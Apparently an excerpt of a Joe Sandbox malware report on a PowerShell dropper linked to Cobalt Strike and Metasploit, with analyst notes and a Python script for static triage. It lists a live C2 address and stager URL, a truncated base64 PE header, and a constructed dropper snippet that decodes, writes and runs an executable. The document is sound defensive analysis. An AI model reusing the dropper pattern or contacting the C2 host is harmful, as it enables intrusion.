Two of these entries need context. WER16A.tmp.dmp is the crash dump WerFault wrote for tmpE651.exe (PID 3848), which is why the Metasploit shellcode rules fire on it as a "dropped file" in addition to the 0x1D0000 region of the live process; the dump is the easiest artifact to carve the stager from. The __PSScriptPolicyTest_*.ps1 file is created by PowerShell itself to probe AppLocker/WDAC script enforcement on start-up and is not sample activity.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, urlmon.dll, iertutil.dll, netutils.dll, edputil.dll, windows.staterepositoryps.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Sections loaded: apphelp.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

The module lists are the ordinary PowerShell host set plus amsi.dll, whose presence is what lets AMSI see the FromBase64String argument recorded under Data Obfuscation. For tmpE651.exe, wininet.dll followed by winhttp.dll, mswsock.dll and iphlpapi.dll is the load sequence of a WinINet-based HTTP stager fetching its stage, matching the GET /EkTY in the traffic capture.

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAA
Source: tmpE651.exe.0.dr | Static PE information: section name: .xdata

The base64 that AMSI caught (truncated in the report) decodes to a PE header: "MZ" with e_lfanew = 0x80, the standard DOS stub text, and "PE\0\0" followed by Machine 0x8664 (x64) and NumberOfSections 9, consistent with the x64 image PowerShell writes out as tmpE651.exe. The .xdata section holds x64 unwind data and is emitted by GCC/MinGW-w64 builds, which is why the report flags it as a non-standard section name; together with the nine sections it points to a MinGW-compiled shellcode runner rather than a Visual Studio build.
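The dropper pattern the ditekSHen rule keys on (chunked base64, -join, FromBase64String, WriteAllBytes, then execution) can be triaged statically without running the script. The following is an added example, not code from the sample or from Joe Sandbox: it finds base64 literals in a script, re-joins chunks that sit next to each other, decodes them and reports any embedded PE header's architecture and section count. The script text is constructed to mimic the dropper; its payload is the base64 prefix that AMSI captured above, with the run of 47 'A' characters written as "A" * 47, so it decodes to the first 136 bytes of the dropped PE only, which is enough for the header check.

```python
"""Static triage of a PowerShell dropper: locate, re-join and decode base64 blobs,
then check for an embedded PE header."""
import base64
import re

# The AMSI capture from this report (header only; the report truncates the rest).
AMSI_CAPTURE = ("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" + "A" * 47
                + "gAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu"
                + "DQ0KJAAAAAAAAABQRQAAZIYJAA")

# Constructed dropper text: chunked base64 array, -join, FromBase64String, WriteAllBytes, execution.
SAMPLE_PS1 = r"""
$p = @('{0}',
       '{1}',
       '{2}')
$b = [System.Convert]::FromBase64String(($p -join ''))
[System.IO.File]::WriteAllBytes("$env:TEMP\tmpE651.exe", $b)
Start-Process "$env:TEMP\tmpE651.exe"
""".format(AMSI_CAPTURE[:60], AMSI_CAPTURE[60:120], AMSI_CAPTURE[120:])

INDICATORS = ("FromBase64String", "WriteAllBytes", "-join", "Start-Process",
              "Invoke-Expression", "IEX", "Reflection.Assembly")
LITERAL_RE = re.compile(r"'([A-Za-z0-9+/=]{16,})'")   # single-quoted base64-looking literals
GLUE_RE = re.compile(r"^[\s,+]*$")                    # what may separate chunks of one blob: @(...) commas, + concatenation
MACHINE = {0x14C: "I386", 0x8664: "AMD64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def base64_candidates(script):
    """Decoded blobs worth inspecting: each run of adjacent literals joined, plus every literal alone."""
    runs, current, last_end = [], [], 0
    for m in LITERAL_RE.finditer(script):
        if current and GLUE_RE.match(script[last_end:m.start()]):
            current.append(m.group(1))
        else:
            if current:
                runs.append(current)
            current = [m.group(1)]
        last_end = m.end()
    if current:
        runs.append(current)
    blobs = []
    for run in runs:
        texts = (["".join(run)] if len(run) > 1 else []) + run
        for text in texts:
            try:
                blobs.append(base64.b64decode(text + "=" * (-len(text) % 4), validate=True))
            except ValueError:        # not valid base64 after all
                pass
    return blobs


def parse_pe_header(data):
    """Minimal MZ/PE check: e_lfanew, PE signature, COFF Machine and NumberOfSections."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    info = {"e_lfanew": e_lfanew, "pe_signature": False}
    if e_lfanew + 8 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
        machine = int.from_bytes(data[e_lfanew + 4:e_lfanew + 6], "little")
        info.update(pe_signature=True, machine=MACHINE.get(machine, hex(machine)),
                    sections=int.from_bytes(data[e_lfanew + 6:e_lfanew + 8], "little"))
    return info


def triage(script):
    """Indicator strings present plus every decoded blob that carries a PE header."""
    found = [i for i in INDICATORS if i in script]
    headers = [h for h in map(parse_pe_header, base64_candidates(script)) if h]
    return {"indicators": found, "embedded_pe": headers}


if __name__ == "__main__":
    print(triage(SAMPLE_PS1))
```

Joining adjacent chunks before decoding is the important step: a single chunk of this dropper decodes to fewer than 0x40 bytes and would never reach the PE check on its own.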
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7800BD pushad ; iretd 0_2_00007FFD9B7800C1
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_001D0128 push eax; ret 2_2_001D0364
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE651.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe TID: 4480 | Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe TID: 4480 | Thread sleep time: -340000s >= -30000s
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Amcache.hve.5.dr | Binary or memory string: VMware
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000ED000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

      Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Code function: 2_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Code function: 2_2_00402F69 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Code function: 2_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Code function: 2_2_004092E4 SetUnhandledExceptionFilter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Code function: 2_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe | Code function: 2_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe

      Remote Access Functionality

Source: Yara match | File source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the number in front of a technique is the count of signatures mapped to it in this analysis):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 121 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 12 Process Injection | LSASS Memory | 211 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 111 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 121 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Behavior Graph (ID: 1602897; Sample: fabd6ab15a0540d197f1ceaa312...; Startdate: 30/01/2025; Architecture: WINDOWS; Score: 100)

Start: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
  -> powershell.exe started
       Dropped file: C:\Users\user\AppData\Local\...\tmpE651.exe, PE32+
       Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
       -> tmpE651.exe started
            Network: 3.17.10.250, 49731, 80 AMAZON-02US United States
            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found API chain indicative of debugger detection
            -> WerFault.exe started
       -> conhost.exe started

| Source | Detection | Scanner | Label |
|---|---|---|---|
| fabd6ab15a0540d197f1ceaa312308b8.ps1 | 21% | ReversingLabs | Win64.Backdoor.CobaltStrike |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\tmpE651.exe | 100% | Avira | HEUR/AGEN.1345031 |
| C:\Users\user\AppData\Local\Temp\tmpE651.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Temp\tmpE651.exe | 87% | ReversingLabs | Win64.Backdoor.CobaltStrike |
      No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://.17.10.250:80/EkTY | 0% | Avira URL Cloud | safe |
| http://3.17.10.250/EkTY | 100% | Avira URL Cloud | malware |
| http://3.17.10.250/EkTYs | 0% | Avira URL Cloud | safe |


      No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://.17.10.250:80/EkTY | true | Avira URL Cloud: safe | unknown |
| http://3.17.10.250/EkTY | true | Avira URL Cloud: malware | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.5.dr | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3.17.10.250/EkTYs | tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
3.17.10.250 | unknown | United States | 16509 | AMAZON-02US | true
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1602897
                                  Start date and time:2025-01-30 10:26:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 33s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:fabd6ab15a0540d197f1ceaa312308b8.ps1
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winPS1@5/11@0/1
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:
                                  • Successful, ratio: 88%
                                  • Number of executed functions: 12
                                  • Number of non-executed functions: 15
                                  Cookbook Comments:
                                  • Found application associated with file extension: .ps1
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.165.164.15, 52.168.117.173, 40.69.42.241, 40.126.31.71, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                  • Execution Graph export aborted for target powershell.exe, PID 4312 because it is empty
• Not all processes were analyzed, report is missing behavior information
Time | Type | Description
04:27:00 | API Interceptor | 8x Sleep call for process: powershell.exe modified
04:27:02 | API Interceptor | 37x Sleep call for process: tmpE651.exe modified
04:27:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.17.10.250 | 1.vbs | malicious | CobaltStrike, Metasploit | 3.17.10.250/EkTY
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | 1.vbs | malicious | CobaltStrike, Metasploit | 3.17.10.250
AMAZON-02US | m68k.elf | malicious | Mirai | 54.171.230.55
AMAZON-02US | SOA OF DEC 2024 PT.BINEX.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678 | malicious | HTMLPhisher | 3.161.119.33
AMAZON-02US | SERVED SUMMON LETTER 01-30-2025.pdf | malicious | HTMLPhisher | 13.248.243.5
AMAZON-02US | contract update.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | Updated 2025 Trading Agreement for Direct Purchase account.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | Bank Slip pdf.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | SWIFT COPY.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | http://ndex-log.webflow.io/ | malicious | HTMLPhisher | 18.244.20.134
                                  No context
                                  No context
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8811825035728077
                                  Encrypted:false
                                  SSDEEP:96:wnFHOtkeLGQszhMoh7JfoQXIDcQWc6zcEZcw37/+HbHg/5jgOg0dl/phsv5o1OyG:mNOtkeLGQ80I3D8jZRzuiFkZ24lO8t
                                  MD5:07EFE9A0B055EF658510955DF9486E72
                                  SHA1:359C898DDC85BE8FEB87ECA7C357C0A80285E39A
                                  SHA-256:E288C16CAE9A78BE0FBB7DD9CD403B0BF2AF78F7835696FBFBDCA6D6D5F33E40
                                  SHA-512:C81C92C285C26BF50E1593DF0B38FEE59251D3E53373CB5BEC2D2CE04045DAEBC0DA5AD59C10E9F5F2C0DAA7BE90820747951DD86F31AD5BFDBEB104B12D159E
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.7.0.2.8.2.6.8.7.3.1.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.7.0.2.8.2.7.2.6.3.8.0.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.4.b.5.3.0.6.-.7.c.b.a.-.4.0.7.2.-.9.f.2.7.-.f.c.b.7.2.4.b.e.1.b.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.4.0.9.c.6.b.-.5.e.0.7.-.4.7.a.4.-.9.f.3.f.-.6.c.1.9.b.5.5.1.9.d.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.t.m.p.E.6.5.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.0.8.-.0.0.0.1.-.0.0.1.4.-.a.5.5.9.-.e.c.1.d.f.9.7.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.f.6.4.5.9.c.d.4.9.9.d.5.7.e.8.5.4.8.5.9.b.2.0.e.e.d.6.2.2.9.a.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.a.7.2.2.d.0.e.b.5.1.0.4.d.b.f.7.6.6.1.0.f.d.9.7.0.a.3.a.a.4.b.8.0.7.8.4.0.2.!.t.m.p.E.6.5.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Thu Jan 30 09:27:07 2025, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):147264
                                  Entropy (8bit):1.3241916327819871
                                  Encrypted:false
                                  SSDEEP:384:/TAJHwc3biBq2aOS5iFdYVU/GQdQxwlQZNFAd0W2A4oKaK:/TWHw2bCq2tEeAU+QdQxwlQZNFAd0WzU
                                  MD5:F699959380276DEB7E91C307B12360DE
                                  SHA1:B310FCBC00AD892E7BB310AE09CDCBCD6F276F45
                                  SHA-256:2C7D45305D0023B82BE4A8D9E52AA30CFFE6E8984FEEF0EC957A271C8BBB7CA5
                                  SHA-512:D1FDB594AF7B60853D0756CEB48F55757C8CE48131ECE694275060CBC6DC056374903EB630CA5CCFE41779D38E03401AB5DC927C41E43AC2080150D94B2D20B5
                                  Malicious:false
                                  Yara Hits:
                                  • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, Author: unknown
